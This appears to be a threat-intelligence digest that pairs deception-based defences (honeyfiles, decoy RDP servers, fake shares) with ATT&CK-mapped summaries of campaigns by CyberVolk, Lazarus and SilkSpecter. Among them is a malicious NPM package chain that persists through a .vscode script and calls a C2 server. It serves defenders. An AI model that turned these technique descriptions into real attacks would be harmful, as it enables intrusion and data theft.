The worst of all deceptions is self-deception
Goal: Redirect attacker exfiltration attempts to controlled channels or disrupt their operations.
Approach: Creating fake data channels that appear to be valuable exfiltration routes.
Set up fake network channels, storage devices, or cloud services that appear to be ideal for data exfiltration. Redirect attacker traffic to these channels to capture exfiltrated data, analyze their methods, or disrupt their operations.
Goal: Identify attackers attempting to exfiltrate data and gather information about their targets.
Approach: Creating and monitoring honeyfiles with enticing but fake data.
Plant “honeyfiles” – files with seemingly sensitive information – in locations where attackers are likely to search for valuable data. These files contain fabricated data, tracking mechanisms, or even trigger alerts upon access.
The CyberVolk group is actively developing and deploying ransomware, potentially targeting organizations based on geopolitical motivations.
T1566 – CyberVolk has been observed utilizing phishing emails and LinkedIn messages to distribute malicious links to targets.
T1490 – The ransomware terminates processes associated with Microsoft Management Console (MMC) or Task Manager.
T1486 – The ransomware displays a payment screen with a decryption timer and payment details, including BTC and USDT options. The ransom amount is set to $1000.00, and the timer is set to 5 hours.
T1566.001 – The attacker sends a phishing email containing a malicious link to a GitHub repository disguised as a legitimate project.
T1133 – The attacker hosts malicious code, disguised as an NPM package, on a public GitHub repository.
T1059.003 – The victim, a developer, uses the npm install command to install the malicious NPM package from the GitHub repository.
T1543 – The malicious NPM package contains a script that executes a malicious JavaScript file (‘test.js’) located in the ‘.vscode’ folder, establishing persistence on the victim’s machine.
T1071.001 – The malicious JavaScript file uses the cURL command to communicate with the attacker’s C2 server over HTTP to download additional payloads.
T1041 – The attacker uses the established C2 channel to exfiltrate sensitive data from the victim’s machine.
Goal: Disrupt attacker attempts to exploit common local administrator passwords for lateral movement.
Approach: Deploying a diverse set of fake local administrator passwords across systems.
Configure systems with a variety of deceptive local administrator passwords that differ from the actual password. This can slow down or frustrate attackers who rely on common passwords or credential dumping techniques.
Goal: Lure attackers attempting to use RDP for lateral movement and gather information about their tools and techniques.
Approach: Deploying and monitoring fake RDP servers.
Set up decoy RDP servers that mimic legitimate systems but capture attacker credentials, log keystrokes, or redirect them to a controlled environment.
Goal: Detect attempts to access sensitive or restricted network shares.
Approach: Creating and monitoring fake network shares.
Create fake network shares with enticing names or permissions that appear to contain valuable data. Monitor any access attempts to these shares to identify attackers and gather information about their activities.
The Lazarus group is conducting a spearphishing campaign targeting individuals involved in the maritime industry, particularly yacht and luxury vessel sales, using malicious attachments to deliver malware.
SilkSpecter actors are targeting online shoppers during the Black Friday period with spearphishing emails containing malicious attachments. These attachments likely contain obfuscated malware designed to evade detection and exfiltrate sensitive information like credit card details.